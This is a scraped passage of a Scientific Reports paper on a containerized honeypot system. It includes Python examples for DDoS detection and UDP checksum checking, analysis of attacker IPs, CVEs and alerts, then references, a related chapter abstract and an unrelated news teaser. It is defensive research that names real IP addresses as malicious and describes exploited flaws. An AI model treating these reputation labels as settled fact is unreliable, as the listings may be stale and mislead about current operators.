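The detector just described, written out as an added example (not code from the paper or from reference 51): it bins flow records into fixed windows, computes the two metrics per window (distinct sources, and sources whose bytes exceed a threshold), learns a mean and standard deviation from the leading windows and flags any later window that deviates by more than k standard deviations. The flow records are constructed in the script (ten quiet windows of sixteen repeat clients, then two flood windows of spoofed one-datagram sources plus a few heavy senders); the window length, baseline size, byte threshold and k are the example's own parameters, not values the paper reports.

```python
import random
import statistics
from collections import defaultdict

WINDOW = 10            # seconds per observation window (example parameter)
BASELINE_WINDOWS = 8   # leading windows used to learn the normal mean and deviation
K_SIGMA = 3.0          # how many standard deviations count as a "prominent" deviation
HEAVY_BYTES = 8000     # a source is "non-complying" above this many bytes in one window


def make_records(seed=7):
    """Constructed flow records (seconds, src_ip, bytes); illustrative, not captured data."""
    rng = random.Random(seed)
    pool = [f"203.0.113.{i}" for i in range(1, 21)]
    records = []
    for w in range(10):                               # ten quiet windows: 16 known clients each
        clients = [pool[(3 * w + j) % len(pool)] for j in range(16)]
        for src in clients:                           # every client shows up at least once
            records.append((w * WINDOW + rng.random() * WINDOW, src, rng.randint(60, 600)))
        for _ in range(24):                           # plus some repeat traffic
            records.append((w * WINDOW + rng.random() * WINDOW, rng.choice(clients), rng.randint(60, 600)))
    for w in range(10, 12):                           # two flood windows
        for _ in range(300):                          # many never-seen (spoofed) sources, one datagram each
            src = f"198.51.{rng.randint(100, 103)}.{rng.randint(1, 254)}"
            records.append((w * WINDOW + rng.random() * WINDOW, src, 1200))
        for i in range(5):                            # and a few sources that blow the per-window byte budget
            for _ in range(20):
                records.append((w * WINDOW + rng.random() * WINDOW, f"192.0.2.{i}", 1400))
    records.sort()
    return records


def window_stats(records, window=WINDOW, heavy_bytes=HEAVY_BYTES):
    """Per window: number of distinct source IPs and number of sources above the byte threshold."""
    bytes_per_src = defaultdict(lambda: defaultdict(int))
    for t, src, nbytes in records:
        bytes_per_src[int(t // window)][src] += nbytes
    return [{"window": w,
             "unique_src": len(srcs),
             "heavy_src": sum(1 for b in srcs.values() if b > heavy_bytes)}
            for w, srcs in sorted(bytes_per_src.items())]


def detect(stats, baseline_windows=BASELINE_WINDOWS, k=K_SIGMA):
    """Flag windows whose metrics deviate from the baseline mean by more than k standard deviations."""
    limits = {}
    for metric in ("unique_src", "heavy_src"):
        values = [s[metric] for s in stats[:baseline_windows]]
        mean = statistics.fmean(values)
        std = max(statistics.pstdev(values), 1.0)   # floor: a perfectly flat baseline must not fire on +1
        limits[metric] = (mean, k * std)
    alerts = []
    for s in stats[baseline_windows:]:
        reasons = [m for m, (mean, tol) in limits.items() if abs(s[m] - mean) > tol]
        if reasons:
            alerts.append({"window": s["window"], "reasons": reasons,
                           "unique_src": s["unique_src"], "heavy_src": s["heavy_src"]})
    return alerts


if __name__ == "__main__":
    for alert in detect(window_stats(make_records())):
        print(alert)
```

Two details matter in practice. The baseline must come from windows known to be quiet (here the first eight), otherwise an attack in progress inflates the mean and hides itself. And the standard-deviation floor is not cosmetic: a honeypot with a very steady trickle of scanners has a near-zero deviation, and without the floor a single extra scanner would trip the rule.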

Figure 8. Attacker source IP count percentage by the Ddospot honeypot.

Because the top four attackers in region 1 (Fig. 8), 157.230.64.246, 47.101.147.143, 178.237.56.152 and 45.45.45.45, produced far more hits than the rest of the list, we concentrated our analysis on them. IP reputation lookups at WhatIsMyIPAddress and DNSChecker designate 157.230.64.246 (DigitalOcean ASN) as malicious, with a reported spam score of 508.4 49. The IP 47.101.147.143, whose network owner is Hangzhou Alibaba Advertising Co. Ltd, has a critical spam level and a poor e-mail reputation. The addresses 178.237.56.152 (Amsterdam, Netherlands; owner Hostcircle B.V.) and 45.45.45.45 (ISP Videotron, Canada) have been flagged for IP and domain reputation issues by a DNSBL (Domain Name System Blacklist: https://matrix.spfbl.net/ipaddress) and by VirusTotal (https://virustotal.com). E-mail sent from these IPs is either rejected or delivered to the recipient's spam folder. The remaining IP addresses are also present on blocklists and are categorised as attackers. Reputation data should be read with care: cloud and hosting addresses are recycled between tenants, so a listing describes the address's history rather than necessarily its current operator.

Suspicious URL commands

Some of the intruders attempted to download malicious content from other sources after gaining access to our honeypot (Fig. 9). Details of the malicious URLs (ref: https://www.virustotal.com) are listed in Table 2. The SHA-256 column holds the hash of the body of the HTTP response the server returned when the URL was fetched; this is the value VirusTotal reports for a scanned URL, and it allows the fetched payload to be matched against known samples even after the hosting URL goes offline.

Figure 9. Suspicious URL commands.

Auxiliary analysis

p0f, which performs passive operating-system detection from SYN packets, helps identify the operating systems running on the attackers' machines. Distinct operating systems are used to carry out the attacks, mostly Linux 2.2.x to 3.x kernels and Windows 7 or 8, as shown in Fig. 10. Linux is a popular choice for attackers owing to its adaptability, open-source nature, portability, command-line interface and the range of hacking tools that run on it. Note that p0f reports the TCP/IP stack of the host that actually sent the SYN; when an attacker operates through a proxy or a rented cloud VM, the fingerprint belongs to that intermediary, not to the attacker's own workstation.

Figure 10. Operating systems used by the intruders to launch attacks.

Figure 11. Top CVEs identified by the honeypot system.

Suricata CVE data is another useful element of the interface; CVE identification is provided by the Suricata threat-detection engine 52, 53. Recent CVEs being exploited include CVE-2021-36260 (a command-injection flaw in the web server of several Hikvision appliances: because input is inadequately validated, an attacker can execute commands by sending messages that embed malicious commands) and CVE-2020-11899 (a Treck TCP/IP stack flaw: improper input validation in the IPv6 component when handling a packet sent by an unauthenticated attacker, which can lead to an out-of-bounds read and a denial of service). It is obvious that attackers still exploit older flaws (Fig. 11), so organisations should address those deficiencies at the earliest opportunity.

Figure 12. Alert signatures identified by the honeypot system.

ICMP_INFO PING and UDPv4 invalid checksum are the most frequently reported alert signatures from Suricata, as shown in Fig. 12. ICMP_INFO PING shows that ping remains the most widely used reconnaissance tool for determining whether a specific host is reachable over an IP network. UDP offers no assurance that datagrams will be received at the other end; those that do arrive are checked and dropped if their checksum does not match (UDPv4 invalid checksum). A UDP flood is a volumetric DoS attack in which the attacker hits arbitrary ports on the target with IPv4 packets carrying UDP datagrams 54, and this contributes substantially to the hit count in the DDoS honeypot. One caveat when reading this signature: if the capture interface has checksum offloading enabled, Suricata sees locally transmitted packets before the NIC fills in the checksum and reports them as invalid, so the counter should be checked against traffic direction before it is attributed to attackers.
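
What the "UDPv4 invalid checksum" decoder event actually tests is the one's complement checksum over the IPv4 pseudo-header (source, destination, protocol 17, UDP length) plus the UDP header and payload. The following added example (not code from the paper or from Suricata) builds a UDP segment and a minimal IPv4 header, then verifies them the way a decoder would; it also shows the two cases that trip people up: a zero checksum, which RFC 768 permits over IPv4 and which is reported as absent rather than invalid, and a source address altered on the wire, which invalidates the UDP checksum through the pseudo-header even though no UDP byte changed. Addresses, ports and payload are constructed for illustration.

```python
import socket
import struct

UDP_PROTO = 17


def ones_complement_sum(data):
    """16-bit one's complement sum (RFC 1071); odd-length input is zero-padded."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:                          # fold the carries back in
        total = (total & 0xFFFF) + (total >> 16)
    return total


def pseudo_header(src_ip, dst_ip, udp_len):
    return socket.inet_aton(src_ip) + socket.inet_aton(dst_ip) + struct.pack("!BBH", 0, UDP_PROTO, udp_len)


def udp_checksum(src_ip, dst_ip, segment):
    """Checksum of a UDP segment whose checksum field is zero, over pseudo-header + segment."""
    csum = 0xFFFF - ones_complement_sum(pseudo_header(src_ip, dst_ip, len(segment)) + segment)
    return csum or 0xFFFF                       # RFC 768: a computed zero is transmitted as all ones


def build_udp_segment(src_ip, dst_ip, sport, dport, payload):
    header = struct.pack("!HHHH", sport, dport, 8 + len(payload), 0)
    csum = udp_checksum(src_ip, dst_ip, header + payload)
    return header[:6] + struct.pack("!H", csum) + payload


def verify_udp(src_ip, dst_ip, segment):
    """'absent' (zero checksum, legal over IPv4), 'valid', or 'invalid', as a decoder would judge it."""
    if len(segment) < 8:
        return "invalid"
    udp_len, csum = struct.unpack("!HH", segment[4:8])
    if udp_len < 8 or udp_len > len(segment):
        return "invalid"                        # length field disagrees with what is on the wire
    if csum == 0:
        return "absent"
    segment = segment[:udp_len]                 # ignore any link-layer padding after the datagram
    return "valid" if ones_complement_sum(pseudo_header(src_ip, dst_ip, udp_len) + segment) == 0xFFFF else "invalid"


def build_ipv4(src_ip, dst_ip, segment, ttl=64):
    """Minimal IPv4 header (IHL=5, no options) in front of the segment, with its own header checksum."""
    header = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(segment), 0, 0, ttl, UDP_PROTO, 0,
                         socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    hcsum = (0xFFFF - ones_complement_sum(header)) & 0xFFFF
    return header[:10] + struct.pack("!H", hcsum) + header[12:] + segment


def verify_packet(packet):
    """Parse an IPv4 packet and verify the UDP checksum using the addresses actually on the wire."""
    ihl = (packet[0] & 0x0F) * 4
    total_len = struct.unpack("!H", packet[2:4])[0]
    if packet[9] != UDP_PROTO:
        return "not_udp"
    if ones_complement_sum(packet[:ihl]) != 0xFFFF:
        return "bad_ip_header"                  # verify the IP header before trusting src/dst from it
    src_ip = socket.inet_ntoa(packet[12:16])
    dst_ip = socket.inet_ntoa(packet[16:20])
    return verify_udp(src_ip, dst_ip, packet[ihl:total_len])


if __name__ == "__main__":
    seg = build_udp_segment("192.0.2.10", "198.51.100.5", 40000, 53, b"honeypot!")
    print(verify_packet(build_ipv4("192.0.2.10", "198.51.100.5", seg)))
```

The pseudo-header is the reason a spoofed-source flood shows up under this signature in bulk: a tool that rewrites the IPv4 source without recomputing the UDP checksum produces datagrams that fail verification at every receiver, while an offloading NIC on the capture host produces the same event for outbound packets, which is why direction must be checked before counting.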

The hits reveal that the overwhelming majority of attacks target SMB on port 445, a service exploited by many campaigns, including the more recent SMBGhost (CVE-2020-0796) and SMBleed (CVE-2020-1206) as well as EternalBlue/WannaCry (CVE-2017-0144). Attacks were recorded from all over the world, with the usual offenders named 55. This information can be used to carefully restrict access to vital services from the ASNs and IP addresses concerned. The interesting fact that there were no hits on the Log4j honeypot may be attributed to organisations being well informed and having upgraded to a patched Log4j version, although, as noted in the conclusion, the absence of hits on one honeypot says only what reached that honeypot during the observation window.

Conclusion and future enhancements

Despite not being a cutting-edge technology, honeypots significantly increase the volume of information an enterprise can harvest. While honeypot data helps map the threat landscape, honeypots see only the activity directed at them. We cannot conclude that a threat does not exist merely because it has not been aimed at the honeypot.

We succeeded in operationalising, quickly, a multi-honeypot system that offers researchers a great deal of information while serving our primary objective for the work, that of a real-time warning asset. The honeypots performed effectively in correlating events and in collecting a large number of malware samples that were significant during our experiment. We were also able to capture events for DDoS attacks, which were predominant. The system setup offered a good all-in-one solution for tracking real attacks on numerous services in real time, and the front-end dashboards offered an excellent way of analysing and organising patterns among attacks and of creating clear, expressive views from the front line of the internet. Several honeypot frameworks have been proposed merely as proofs of concept and are no longer maintained by their designers; long-term ventures are infrequent. Future work can use the knowledge gathered from the system to investigate zero-day vulnerabilities and to develop IP delisting and intrusion detection and prevention policies. In a forthcoming revision we plan to address the system's present inability to give an early warning when DDoS traffic is spotted, by integrating threat intelligence.

Data availability

The datasets generated and analyzed during the current study are available at the link: RAW DATA .

Dwivedi, R. K. & Kumar, R. Sensor cloud: Integrating wireless sensor networks with cloud computing. in 2018 5th IEEE Uttar Pradesh Section International Conference on Electrical, Electronics and Computer Engineering (UPCON) . 1–6. https://doi.org/10.1109/UPCON.2018.8597008 (IEEE, 2018).

Baykara, M. & Das, R. A novel honeypot based security approach for real-time intrusion detection and prevention systems. J. Inf. Secur. Appl. 41 , 103–116 (2018).


IBM Report: How Much Does a Data Breach Cost in 2022? Accessed 08 Dec 2022 (2022).

Northport. N.Y. Cybercrime Magazine (2021).

Batchu, R. K. & Seetha, H. A generalized machine learning model for DDoS attacks detection using hybrid feature selection and hyperparameter tuning. Comput. Netw. 200 , 108498. https://doi.org/10.1016/j.comnet.2021.108498 (2021).


Halvorsen, J., Waite, J. & Hahn, A. Evaluating the observability of network security monitoring strategies with tomato. IEEE Access 7 , 108304–108315. https://doi.org/10.1109/ACCESS.2019.2933415 (2019).

Kumar, R.S.S., Wicker, A. & Swann, M. Practical machine learning for cloud intrusion detection: Challenges and the way forward. in Proceedings of the 10th ACM Workshop on Artificial Intelligence and Security . 81–90 (2017).

Agrawal, N. & Tapaswi, S. The performance analysis of honeypot based intrusion detection system for wireless network. Int. J. Wirel. Inf. Netw. 24 , 14–26 (2017).

Shafiq, M., Tian, Z., Sun, Y., Du, X. & Guizani, M. Selection of effective machine learning algorithm and Bot–IoT attacks traffic identification for internet of things in smart city. Future Gener. Comput. Syst. 107 , 433–442. https://doi.org/10.1016/j.future.2020.02.017 (2020).

Shafiq, M., Tian, Z., Bashir, A. K., Du, X. & Guizani, M. Corrauc: A malicious Bot–IoT traffic detection method in IoT network using machine-learning techniques. IEEE Internet Things J. 8 , 3242–3254. https://doi.org/10.1109/JIOT.2020.3002255 (2021).

Shafiq, M., Tian, Z., Bashir, A. K., Du, X. & Guizani, M. Iot malicious traffic identification using wrapper-based feature selection mechanisms. Comput. Secur. 94 , 101863. https://doi.org/10.1016/j.cose.2020.101863 (2020).

Baykara, M. & Das, R. A novel honeypot based security approach for real-time intrusion detection and prevention systems. J. Inf. Secur. Appl. 41 , 103–116. https://doi.org/10.1016/j.jisa.2018.06.004 (2018).

Artail, H., Safa, H., Sraj, M., Kuwatly, I. & Al-Masri, Z. A hybrid honeypot framework for improving intrusion detection systems in protecting organizational networks. Comput. Secur. 25 , 274–288. https://doi.org/10.1016/j.cose.2006.02.009 (2006).

Sharma, S. & Kaul, A. A survey on intrusion detection systems and honeypot based proactive security mechanisms in VANETS and VANET cloud. Vehic. Commun. 12 , 138–164 (2018).

Kambow, N. & Passi, L. K. Honeypots: The need of network security. Int. J. Comput. Sci. Inf. Technol. 5 , 6098–6101 (2014).

Github: Ghost-usb-Honeypot . Accessed 30 Sep 2021 (2021).

Franco, J., Aris, A., Canberk, B. & Uluagac, A. S. A survey of honeypots and honeynets for internet of things, industrial internet of things, and cyber-physical systems. IEEE Commun. Surv. Tutorials 23 , 2351–2383. https://doi.org/10.1109/COMST.2021.3106669 (2021).

Krishnaveni, S., Prabakaran, S. & Sivamohan, S. A survey on honeypot and honeynet systems for intrusion detection in cloud environment. J. Comput. Theor. Nanosci. 15 , 2949–2953 (2018).


Fan, W., Du, Z., Fernández, D. & Villagrá, V. A. Enabling an anatomic view to investigate honeypot systems: A survey. IEEE Syst. J. 12 , 3906–3919. https://doi.org/10.1109/JSYST.2017.2762161 (2018).


Wan, X., Guan, X., Wang, T., Bai, G. & Choi, B.-Y. Application deployment using microservice and docker containers: Framework and optimization. J. Netw. Comput. Appl. 119 , 97–109. https://doi.org/10.1016/j.jnca.2018.07.003 (2018).

Pahl, C., Jamshidi, P. & Zimmermann, O. Microservices and containers. in Software Engineering 2020 (Felderer, M., Hasselbring, W., Rabiser, R. & Jung, R. eds.). 115–116. https://doi.org/10.18420/SE2020_34 (Gesellschaft für Informatik e.V., 2020).

Liu, G. et al. Microservices: Architecture, container, and challenges. in 2020 IEEE 20th International Conference on Software Quality, Reliability and Security Companion (QRS-C) . 629–635. https://doi.org/10.1109/QRS-C51114.2020.00107 (2020).

Rashid, S. et al. Faking smart industry: Exploring cyber-threat landscape deploying cloud-based honeypot. Wirel. Netw. 1–15 (2022).

The Honeynet Project: Spam Honeypot with Intelligent Virtual Analyzer . Accessed 15 June 2022 (2022).

Liston, tom:labera . Accessed 13 June 2022 (2022).

Valicek, M., Schramm, G., Pirker, M. & Schrittwieser, S. Creation and integration of remote high interaction honeypots. in 2017 International Conference on Software Security and Assurance (ICSSA) . 50–55. https://doi.org/10.1109/ICSSA.2017.21 (2017).

Sun, Y. et al. Honeypot identification in softwarized industrial cyber-physical systems. IEEE Trans. Ind. Inform. 17 , 5542–5551 (2020).

Tsikerdekis, M., Zeadally, S., Schlesener, A. & Sklavos, N. Approaches for preventing honeypot detection and compromise. in 2018 Global Information Infrastructure and Networking Symposium (GIIS) . 1–6. https://doi.org/10.1109/GIIS.2018.8635603 (2018).

Sun, Y., Tian, Z., Li, M., Zhu, C. & Guizani, N. Automated attack and defense framework toward 5g security. IEEE Netw. 34 , 247–253 (2020).

Luo, C. et al. A novel web attack detection system for internet of things via ensemble classification. IEEE Trans. Ind. Inform. 17 , 5810–5818 (2020).

Eibes, M. Telekom Security . Accessed 23 Apr 2022 (2015).

Elastic: Filebeat Overview . Accessed 18 Dec 2022 (2022).

Chen, L., Liu, J., Xian, M. & Wang, H. Docker container log collection and analysis system based on elk. in 2020 International Conference on Computer Information and Big Data Applications (CIBDA) . 317–320. https://doi.org/10.1109/CIBDA50819.2020.00078 (2020).

Elasticsearch, B. Elasticsearch. https://www.elastic.co/pt/ . Accessed 12 Sep 2019 (2018).

Arcuri, A. Restful API automated test case generation with EvoMaster. ACM Trans. Softw. Eng. Methodol. (TOSEM) 28 , 1–37 (2019).

Cabral, W., Valli, C., Sikos, L. & Wakeling, S. Review and analysis of cowrie artefacts and their potential to be used deceptively. in 2019 International Conference on Computational Science and Computational Intelligence (CSCI) . 166–171. https://doi.org/10.1109/CSCI49370.2019.00035 (2019).

Github:cowrie/cowrie . Accessed 22 May 2022 (2022).

Kelly, C., Pitropakis, N., Mylonas, A., McKeown, S. & Buchanan, W. J. A comparative analysis of honeypots on different cloud platforms. Sensors 21 , 2433 (2021).

Ali, P. D. & Kumar, T. G. Malware capturing and detection in dionaea honeypot. in 2017 Innovations in Power and Advanced Computing Technologies (i-PACT) . 1–5. https://doi.org/10.1109/IPACT.2017.8245158 (2017).

Dinotools/dionaea . Accessed 21 Jan 2022 (2022).

Github: johnnykv/heralding. Accessed 24 Mar 2022 (2022).

Github:huuck/adbhoney . Accessed 27 Jan 2022 (2022).

NIST: NVD. Accessed 27 May 2022 (2022).

The Honeynet Project . Accessed 27 May 2022 (2022).

Shah, N., Willick, D. & Mago, V. A framework for social media data analytics using Elasticsearch and Kibana. Wirel. Netw. 28 , 1–9 (2018).

Azarmi, B. Learning Kibana 5.0 (Packt Publishing Ltd, 2017).

Agrawal, N. & Tapaswi, S. Defense mechanisms against DDoS attacks in a cloud computing environment: State-of-the-art and research challenges. IEEE Commun. Surv. Tutorials 21 , 3769–3795. https://doi.org/10.1109/COMST.2019.2934468 (2019).

Batchu, R. K. & Seetha, H. A hybrid detection system for DDoS attacks based on deep sparse autoencoder and light gradient boost machine. J. Inf. Knowl. Manag. 12 , 2250071 (2022).

DNS Checker; whatismyipaddress.com. Accessed 20 Jul 2022 (2022).

Cirlig, G. Trinity-p2p Malware Over adb . Accessed 21 Jul 2022 (2020).

Baishya, R. C., Hoque, N. & Bhattacharyya, D. K. DDoS attack detection using unique source IP deviation. Int. J. Netw. Secur. 19 , 929–939 (2017).

Nam, K. & Kim, K. A study on SDN security enhancement using open source IDS/IPS Suricata. in 2018 International Conference on Information and Communication Technology Convergence (ICTC) . 1124–1126. https://doi.org/10.1109/ICTC.2018.8539455 (2018).

NVD: CVE. Accessed 25 May 2022 (2022).

Qiao, S., Hu, C., Guan, X. & Zou, J. Taming the flow table overflow in openflow switch. in Proceedings of the 2016 ACM SIGCOMM Conference . 591–592 (2016).

Batchu, R.K. & Seetha, H. On improving the performance of DDoS attack detection system. Microprocess. Microsyst. 104571 (2022).


Acknowledgements

The authors would like to thank the editors and reviewers. The authors would like to thank Dr. S. V. Kota Reddy, Vice Chancellor, and Dr. Jagadish Chandra Mudiganti, Registrar, VIT-AP University, for their great support. Special thanks to Dr. Hari Seetha, Director, Centre of Excellence, Artificial Intelligence and Robotics (AIR), and Dr. Ganesh Reddy Karri, Coordinator, Centre of Excellence, Cyber Security, VIT-AP University. Heartfelt thanks to the team members of AIR and Cyber Security. A special mention to Tharshith Gaud Jadapalli, team member, AIR, for his continuous support.

Author information

These authors contributed equally: V. S. Devi Priya and S. Sibi Chakkaravarthy.

Authors and Affiliations

Centre of Excellence, Artificial Intelligence and Robotics (AIR); Centre of Excellence, Cyber Security and School of Computer Science and Engineering, VIT-AP University, Amaravati, Andhra Pradesh, 522237, India

V. S. Devi Priya & S. Sibi Chakkaravarthy


Contributions

D.P.: Concept, design, analysis, writing-review, and editing. S.C.: Concept, design, analysis, writing-review, and editing. All authors reviewed the manuscript.

Corresponding author

Correspondence to S. Sibi Chakkaravarthy .

Ethics declarations

Competing interests.

The authors declare no competing interests.

Additional information

Publisher's note.

Springer Nature remains neutral with regard to jurisdictional claims in published maps and institutional affiliations.

Rights and permissions

Open Access This article is licensed under a Creative Commons Attribution 4.0 International License, which permits use, sharing, adaptation, distribution and reproduction in any medium or format, as long as you give appropriate credit to the original author(s) and the source, provide a link to the Creative Commons licence, and indicate if changes were made. The images or other third party material in this article are included in the article's Creative Commons licence, unless indicated otherwise in a credit line to the material. If material is not included in the article's Creative Commons licence and your intended use is not permitted by statutory regulation or exceeds the permitted use, you will need to obtain permission directly from the copyright holder. To view a copy of this licence, visit http://creativecommons.org/licenses/by/4.0/ .


About this article

Cite this article.

Priya, V.S.D., Chakkaravarthy, S.S. Containerized cloud-based honeypot deception for tracking attackers. Sci Rep 13 , 1437 (2023). https://doi.org/10.1038/s41598-023-28613-0

Download citation

Received : 24 October 2022

Accepted : 20 January 2023

Published : 25 January 2023

DOI : https://doi.org/10.1038/s41598-023-28613-0


This article is cited by

Networked industrial control device asset identification method based on improved decision tree.

  • Yushan Fang

Journal of Network and Systems Management (2024)

Secure container Orchestration: A framework for detecting and mitigating Orchestrator - level vulnerabilities

  • V. Mahavaishnavi
  • R. Saminathan
  • R. Prithviraj

Multimedia Tools and Applications (2024)


Honeypots for Cybercrime Research

  • First Online: 30 July 2021

Cite this chapter


  • Robert C. Perkins 3 &
  • C. Jordan Howell 3 , 4  

1564 Accesses

5 Citations

Honeypots are a type of cybersecurity tool designed with the general purpose of being attacked and compromised by cyberthreats. They became widely popularized throughout the 1990s by computer scientists due to their multi-functional capabilities. As a result, a wide variety of honeypots have been introduced to handle different cybersecurity tasks. Only recently have social scientists begun using them in cybercrime research to test criminological theories and shed light on deviant human behavior in cyberspace. However, arguments have been made for, and against, the utilization of honeypots in this line of research. In this chapter, what constitutes honeypot research in the context of both computer and social science is described. Finally, the chapter concludes itself with advice and suggestions for scholars interested in using honeypots in their own research endeavors.



McGrew, R. (2006). Experiences with honeypot systems: Development, deployment, and analysis. In Proceedings of the 39th Annual Hawaii International Conference on System Sciences (HICSS’06) (Vol. 9, pp. 220a–220a). IEEE.

Nawrocki, M., Wählisch, M., Schmidt, T. C., Keil, C., & Schönfelder, J. (2016). A survey on honeypot software and data analysis. arXiv preprint arXiv:1608.06249 .

Newman, G. R., & Socia, K. (2007). Sting operations . US Department of Justice, Office of Community Oriented Policing Services.

Oluwatosin, H. S. (2014). Client-server model. IOSR Journal of Computer Engineering (IOSR-JCE) , 16 (1), 67.

Oosterhof, M. (2015). Cowrie—Active kippo fork .

Pa, Y. M. P., Suzuki, S., Yoshioka, K., Matsumoto, T., Kasama, T., & Rossow, C. (2015). IoTPOT: Analysing the rise of IoT compromises. In 9th {USENIX} Workshop on Offensive Technologies ({WOOT} 15) .

Patton, M., Gross, E., Chinn, R., Forbis, S., Walker, L., & Chen, H. (2014). Uninvited connections: A study of vulnerable devices on the Internet of Things (IoT). In 2014 IEEE Joint Intelligence and Security Informatics Conference (pp. 232–235). IEEE.

Podhradsky, A., Casey, C., & Ceretti, P. (2012). The Bluetooth honeypot project: Measuring and managing bluetooth risks in the workplace. International Journal of Interdisciplinary Telecommunications and Networking (IJITN), 4 (3), 1–22.

Poeplau, S., & Gassen, J. (2012). A honeypot for arbitrary malware on USB storage devices. In 2012 7th International Conference on Risks and Security of Internet and Systems (CRiSIS) (pp. 1–8). IEEE.

Portokalidis, G., Slowinska, A., & Bos, H. (2006). Argos: An emulator for fingerprinting zero-day attacks for advertised honeypots with automatic signature generation. ACM SIGOPS Operating Systems Review, 40 (4), 15–27.

Pouget, F., & Dacier, M. (2004). Honeypot-based forensics. In AusCERT Asia Pacific Information Technology Security Conference.

Provos, N. (2004). A virtual honeypot framework. In USENIX Security Symposium (Vol. 173, No. 2004, pp. 1–14).

Provos, N., & Holz, T. (2007). Virtual honeypots: From botnet tracking to intrusion detection . Pearson Education.

Raynal, F., Berthier, Y., Biondi, P., & Kaminsky, D. (2004). Honeypot forensics part 1: Analyzing the network. IEEE Security and Privacy, 2 (4), 72–78.

Rege, A. (2013). Factors Impacting Attacker Decision-Making in Power Grid Cyber Attacks. In International Conference on Critical Infrastructure Protection (pp. 125–138). Springer, Berlin, Heidelberg.

Rist, L. (2009). Glastopf project. The Honeynet Project .

Rist, L., Vestergaard, J., Haslinger, D., Pasquale, A., & Smith, J. (2013). Conpot ics/SCADA honeypot . Honeynet Project ( conpot.org ).

Roesch, M. (1999). Snort: Lightweight intrusion detection for networks. In Lisa (Vol. 99, No. 1, pp. 229–238).

Ryan, J. (2010). A history of the Internet and the digital future . Reaktion Books.

Schindler, S., Schnor, B., & Scheffler, T. (2015). Hyhoneydv6: A hybrid honeypot architecture for IPV6 networks. International Journal of Intelligent Computing Research, 6 .

Schneier, B. (2015). Secrets and lies: Digital security in a networked world . Wiley.

Book   Google Scholar  

Seifert, C., Welch, I., & Komisarczuk, P. (2007). Honeyc-the low-interaction client honeypot. In Proceedings of the 2007 NZCSRCS (Vol. 6). Waikato University, Hamilton, New Zealand.

Spitzner, L. (2001). The value of honeypots, part one: Definitions and values of honeypots. Security Focus .

Spitzner, L. (2002). Honeypots: Tracking hackers Addison Wesley Professional .

Spitzner, L. (2003). Specter: A commercial honeypot solution for windows. Acesso em , 26 (8).

Spitzner, L. (2005). Know your enemy: Honeynets. Honeynet Project .

Spitzner, L., & Roesch, M. (2001). The value of honeypots, part one: Definitions and values of honeypots .

Stanislav, M., & Beardsley, T. (2015). Hacking IoT: A case study on baby monitor exposures and vulnerabilities. Rapid7 Report .

Steinmetz, K. F. (2017). Ruminations on warning banners, deterrence, and system intrusion research. Criminology & Pub. Pol’y, 16 , 725.

Stoll, C. (1990). The cuckoo’s egg: Tracking a spy through the maze of computer espionage .

Testa, A., Maimon, D., Sobesto, B., & Cukier, M. (2017). Illegal roaming and file manipulation on target computers: Assessing the effect of sanction threats on system trespassers’ online behaviors. Criminology and Public Policy, 16 (3), 689–726.

Trivedi, A. J., Judge, P., & Krasser, S. (2007). Analyzing network and content characteristics of spim using honeypots. In SRUTI .

Udhani, S., Withers, A., & Bashir, M. (2019). Human vs bots: Detecting human attacks in a honeypot environment. In 2019 7th International Symposium on Digital Forensics and Security (ISDFS) (pp. 1–6). IEEE.

Vetterl, A. (2020). Honeypots in the age of universal attacks and the Internet of Things . Doctoral dissertation, University of Cambridge.

Vlajic, N., & Zhou, D. (2018). IoT as a land of opportunity for DDoS hackers. Computer, 51 (7), 26–34.

Wilson, T., Maimon, D., Sobesto, B., & Cukier, M. (2015). The effect of a surveillance banner in an attacked computer system: Additional evidence for the relevance of restrictive deterrence in cyberspace. Journal of Research in Crime and Delinquency, 52 (6), 829–855.

Yaqoob, I., Ahmed, E., ur Rehman, M. H., Ahmed, A. I. A., Al-garadi, M. A., Imran, M., & Guizani, M. (2017). The rise of ransomware and emerging security challenges in the Internet of Things. Computer Networks, 129, 444–458.

Yegneswaran, V., Barford, P., & Paxson, V. (2005). Using honeynets for internet situational awareness. In Proceedings of the Fourth Workshop on Hot Topics in Networks (HotNets IV) (pp. 17–22).

Download references

Author information

Authors and affiliations.

Department of Criminal Justice and Criminology, Georgia State University, Atlanta, Georgia, United States of America

Robert C. Perkins & C. Jordan Howell

Department of Criminal Justice, The University of Texas at El Paso, El Paso, Texas, USA

C. Jordan Howell


Corresponding author

Correspondence to Robert C. Perkins .

Editor information

Editors and affiliations.

Department of Sociology, Social Policy and Criminology, University of Southampton, Southampton, UK

Anita Lavorgna

School of Criminal Justice, Michigan State University, East Lansing, MI, USA

Thomas J. Holt


Copyright information

© 2021 The Author(s), under exclusive license to Springer Nature Switzerland AG

About this chapter

Perkins, R.C., Howell, C.J. (2021). Honeypots for Cybercrime Research. In: Lavorgna, A., Holt, T.J. (eds) Researching Cybercrimes. Palgrave Macmillan, Cham. https://doi.org/10.1007/978-3-030-74837-1_12


DOI: https://doi.org/10.1007/978-3-030-74837-1_12

Published: 30 July 2021

Publisher Name: Palgrave Macmillan, Cham

Print ISBN: 978-3-030-74836-4

Online ISBN: 978-3-030-74837-1

eBook Packages: Law and Criminology (R0)

Honeypot Technology Research and Application

  • Published 2013
  • Journal of Software
  • Computer Science, Engineering
  • DOI: 10.3724/sp.j.1001.2013.04369
  • Corpus ID: 63852269


8 Citations

  • Design and implementation of modular honeynet system based on SDN
  • Study on network security proactive defense model based on honey pot technology
  • S7commTrace: a high interactive honeypot for industrial control system based on S7 protocol
  • Web attack detection based on honeypots and logistic regression algorithm
  • SDN virtual honeynet for network attack information acquisition
  • ICSTrace: a malicious IP traceback model for attacking data of industrial control system
  • An efficient multiplex network model for effective honeypot roaming against DDoS attacks
  • Malicious hidden redirect attack web page detection based on CSS features

84 References (first ten shown)

  • Honeypot: a supplemented active defense system for network security
  • Honeypot detection in advanced botnet attacks
  • Honeypot-aware advanced botnet construction and maintenance
  • A hybrid honeypot framework for improving intrusion detection systems in protecting organizational networks
  • A dynamic honeypot design for intrusion detection
  • Towards an invisible honeypot monitoring system
  • Study and design of the proactive security protecting measure-honeynet
  • Detecting targeted attacks using shadow honeypots
  • Experiences with the NoAH honeynet testbed to detect new internet worms
  • Honeypots: tracking hackers


New research focuses on keeping today’s hottest electronics cool for users at nanoscale level

Thermal management works to absorb, dissipate heat created by chips in handheld phones and electric vehicles


